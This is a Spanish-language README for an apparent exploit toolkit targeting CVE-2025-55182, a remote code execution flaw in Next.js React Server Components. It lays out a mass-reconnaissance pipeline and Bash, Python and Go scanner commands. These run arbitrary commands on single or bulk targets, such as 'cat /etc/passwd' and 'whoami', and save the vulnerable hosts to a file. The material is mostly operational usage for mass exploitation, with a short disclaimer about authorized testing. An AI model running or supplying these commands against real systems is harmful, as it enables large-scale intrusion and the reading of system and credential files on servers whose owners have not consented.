
Escáner de RCE de alta fidelidad para CVE-2025-55182 que afecta a Next.js RSC. Admite escaneo masivo, ejecución de comandos y pipelines de reconocimiento automatizados. Diseñado para pentesters, investigadores y cazadores de recompensas.
Un kit de herramientas integral para detectar y explotar CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código en aplicaciones Next.js que utilizan Componentes del Servidor React.
Este repositorio incluye un escáner unificado en Bash (modo único y masivo), implementaciones en Python/Go y un flujo de trabajo de reconocimiento para bug bounty.

Para la caza masiva en dominios comodín, usa este pipeline para filtrar objetivos antes del escaneo:
# 1. Enumerar subdominios
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filtrar hosts activos
httpx -l subs.txt -o live.txt
# 3. Detección previa con Nuclei (opcional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
El script scanner.sh admite escaneo de objetivo único y escaneo masivo desde un archivo de lista.
chmod +x scanner.sh
Ideal para verificar un objetivo específico con salida detallada.
# Verificación básica (usa "id" por defecto)
./scanner.sh -d example.com
# Ejecutar comando personalizado
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Escanea eficientemente una lista de URL y guarda los hosts vulnerables en un archivo.
# Escanear una lista de URL
./scanner.sh -l live.txt -c "whoami"
# Archivo de salida personalizado
./scanner.sh -l live.txt -o my_bounty.txt
Úsala si encuentras problemas con el escape de caracteres especiales en Bash.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Alto rendimiento, dependencias mínimas.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Esta herramienta es únicamente para fines educativos y pruebas de seguridad autorizadas. El uso no autorizado es estrictamente ilegal. El desarrollador no asume ninguna responsabilidad por el mal uso o los daños causados por este programa.
Detalle CVE de NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Aviso de seguridad de React (vulnerabilidad en Componentes del Servidor React): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
Plantilla Nuclei de ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Descripción |
|---|
-d, --domain | URL de objetivo único |
-l, --list | Archivo que contiene la lista de URL |
-c, --command | Comando a ejecutar (por defecto: id) |
-o, --output | Archivo de salida para hosts vulnerables (por defecto: vulnerable_hosts.txt) |